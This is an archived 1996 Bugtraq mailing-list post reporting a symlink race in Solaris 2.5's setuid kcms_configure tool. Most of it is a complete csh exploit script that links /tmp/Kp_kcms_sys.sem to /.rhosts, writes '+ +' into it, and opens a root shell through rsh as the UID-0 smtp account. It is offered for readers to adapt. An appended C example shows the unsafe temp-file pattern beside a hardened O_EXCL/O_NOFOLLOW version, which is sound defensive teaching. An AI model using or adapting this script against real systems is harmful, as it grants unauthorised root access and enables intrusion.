[3008] in bugtraq


Zolaris 2.5 Exploited.

daemon@ATHENA.MIT.EDU (Jungseok Roh)
Thu Jul 25 17:29:09 1996

Date: 	Fri, 26 Jul 1996 04:37:10 -0900
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Jungseok Roh <beren@cosmos.kaist.ac.kr>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

Wow.. I got a chance to use an Ultra SPARC that runs Zolaris 2.5 several days ago ~
then one of my seniors told me that there might be funny, also INCONCEIVABLE
bugs in OpenWindows.. I trusted him...
and I traversed the file system under /usr/openwin ..
there were just four SUIDed files .. ( if the admin installed the openwin packages )
xlock , ff.core , kcms* .. The problem was made less vague.

kcms_calibrate and kcms_configure are the objects we are approaching.
When examining the kcms family, I found a funny thing.
kcms_configure makes temporary(?) files in /tmp whose permission bits
are 666 ( Wow, the sign of the Devil ),, definitely root owns it..
ITS NAME is Kp_kcms_sys.sem !...
Then all you guys know what the next procedure is.
hk.. I can't show you the whole procedure right now.
'Cause my Zolaris machine is "Network Unreachable ...".
One odd thing is that exploitation succeeds when it interacts with kcms_calibrate!!

The major procedure is making the temporary file which is linked to /.rhosts; then,
while kcms_configure tries to write /.rhosts, make thunder roll using
kcms_calibrate and make its power powerful.. puha.. it's like seeing
Back To the Future III... then kcms_configure succeeds in its operation.
I made a simple script exploiting the machine which has that fatal bug.

hmm..but I can't erase one curiosity ..
Why did Sun make this humble mistake ?  ...  plz somebody notify Sun of this bug.
I don't know her e-mail address .. :)

The ( what a simple!! ) script follows .
This script shows you just the PROCEDURE .. re-make it on your demands .

cat > uhit.sh << 'E_O_F'
#!/bin/csh
# JungSeok. Roh  ( beren@cosmos.kaist.ac.kr )
# Junior in KAIST undergraduate. Under Management Dep .
# (The heredoc delimiter above is quoted so that $disp survives into this file
#  instead of being expanded by the shell that runs the cat.)

# X display the kcms tools will talk to: the attacker's own host.
set disp="cosmos.kaist.ac.kr:0.0"
setenv DISPLAY $disp
/bin/rm -rf /tmp/Kp_kcms_sys.sem
cd /tmp

# Make a symbolic link so that root's write to Kp_kcms_sys.sem lands in /.rhosts
ln -s /.rhosts Kp_kcms_sys.sem
/usr/openwin/bin/kcms_calibrate &

# Keep re-running kcms_configure until it has followed the link and created /.rhosts
while (1)

echo "Click the device you've chosen in kcms_calibrate window"

# Choose any profile .. hk..
# My 2.5 machine is unreachable, so I can't get the exact name of that profile.
# What a fool I am.. jjap..
/usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon

if ( -f /.rhosts ) then
        # root created it mode 666, so anyone can append a trust-everybody entry
        echo "+ +" >> /.rhosts
# As you know, we can't login as root .. use the smtp account, which has UID 0 !!
        /usr/bin/rsh localhost -l smtp csh -i
        break
endif
end
E_O_F


__

 There was a legendary security task force team whose name is K/U/S ..
 But it was BLOWN up by the Korean National Prosecutor.. I hate them !!  .......
 They make me so sad ....  Laughin' in bitter tears ...  hk..hk..

 JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400
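
Added example, not code from Roh's post and not Sun's kcms source: the temp-file
pattern the post describes, a privileged program creating /tmp/Kp_kcms_sys.sem with
O_CREAT and mode 0666 and therefore following whatever symlink an attacker planted
there, beside the hardened open() a fix would use (O_EXCL, O_NOFOLLOW, mode 0600).
Everything is staged inside a scratch directory from mkdtemp(), and the file named
"rhosts" in it is a constructed stand-in for /.rhosts. Only the name Kp_kcms_sys.sem
comes from the post; the function names and the scratch layout are this example's
own assumptions.

```c
/* Added example, not code from the original post: the unsafe /tmp temp-file
 * pattern the post describes (a root process creating Kp_kcms_sys.sem with
 * O_CREAT only and mode 0666, so a pre-planted symlink redirects its write
 * into /.rhosts) beside a hardened open(). Staged in a mkdtemp() scratch
 * directory; "rhosts" there is a constructed stand-in for /.rhosts. Only the
 * name Kp_kcms_sys.sem comes from the post; all other names are assumptions. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define SEM_NAME "Kp_kcms_sys.sem"

/* Vulnerable pattern: O_CREAT without O_EXCL/O_NOFOLLOW, mode 0666. A symlink
 * already sitting at `path` is followed, so a privileged caller writes wherever
 * the attacker pointed it. Returns 0 on success, -1 on error. */
int vuln_create_sem(const char *path, const char *payload)
{
    int fd = open(path, O_WRONLY | O_CREAT, 0666);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, payload, strlen(payload));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened pattern: O_EXCL fails if anything (a symlink included) already exists
 * at `path`, O_NOFOLLOW refuses a symlink as the final component, and mode 0600
 * keeps other users out. On failure returns -1 and stores errno in *err if set. */
int safe_create_sem(const char *path, const char *payload, int *err)
{
    int flags = O_WRONLY | O_CREAT | O_EXCL;
#ifdef O_NOFOLLOW
    flags |= O_NOFOLLOW;
#endif
    int fd = open(path, flags, 0600);
    if (fd < 0) {
        if (err)
            *err = errno;
        return -1;
    }
    ssize_t n = write(fd, payload, strlen(payload));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Stage the post's attack in a scratch directory and run both writers:
 *   <dir>/rhosts                      empty stand-in for /.rhosts (constructed)
 *   <dir>/Kp_kcms_sys.sem -> rhosts   the attacker's `ln -s`
 * Returns -1 if staging failed, else a bitmask: 1 = the vulnerable writer's
 * "+ +\n" landed in rhosts (it grew from 0 to 4 bytes); 2 = the hardened writer
 * refused the planted link (EEXIST or ELOOP); 4 = with nothing planted, the
 * hardened writer's file has no group/other bits (umask only clears bits). */
int demo_symlink_race(void)
{
    char dir[] = "/tmp/kcmsdemo.XXXXXX", target[256], link[256];
    struct stat st;
    int fd, err = 0, result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/rhosts", dir);
    snprintf(link, sizeof link, "%s/%s", dir, SEM_NAME);
    fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || symlink(target, link) != 0) {
        result = -1;
    } else {
        if (vuln_create_sem(link, "+ +\n") == 0 && stat(target, &st) == 0 && st.st_size == 4)
            result |= 1;
        if (safe_create_sem(link, "+ +\n", &err) != 0 && (err == EEXIST || err == ELOOP))
            result |= 2;
        unlink(link);                                   /* nothing planted now */
        if (safe_create_sem(link, "+ +\n", NULL) == 0 && lstat(link, &st) == 0 &&
            S_ISREG(st.st_mode) && (st.st_mode & 0077) == 0)
            result |= 4;
    }
    if (fd >= 0)
        close(fd);
    unlink(link); unlink(target); rmdir(dir);
    return result;
}

int main(void)
{
    int r = demo_symlink_race();
    if (r < 0) { perror("staging failed"); return 1; }
    printf("vulnerable open() wrote through the planted symlink: %s\n", r & 1 ? "yes" : "no");
    printf("hardened open() refused the planted symlink:       %s\n", r & 2 ? "yes" : "no");
    printf("hardened open() made a private (0600-style) file:   %s\n", r & 4 ? "yes" : "no");
    return r == 7 ? 0 : 1;
}
```

Build with `cc -Wall -o kcmsdemo kcmsdemo.c` on any POSIX system; nothing here needs
root, because the scratch directory plays the part of /tmp and /.rhosts. Two caveats
for reading it against the 1996 bug: O_NOFOLLOW did not exist on Solaris 2.5, so the
O_EXCL check (and an unpredictable name from mkstemp(3) rather than a fixed
Kp_kcms_sys.sem) is the part that actually closes the race, and O_EXCL alone still
leaves a window if the program later re-opens the file by name instead of keeping
the descriptor it was given.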
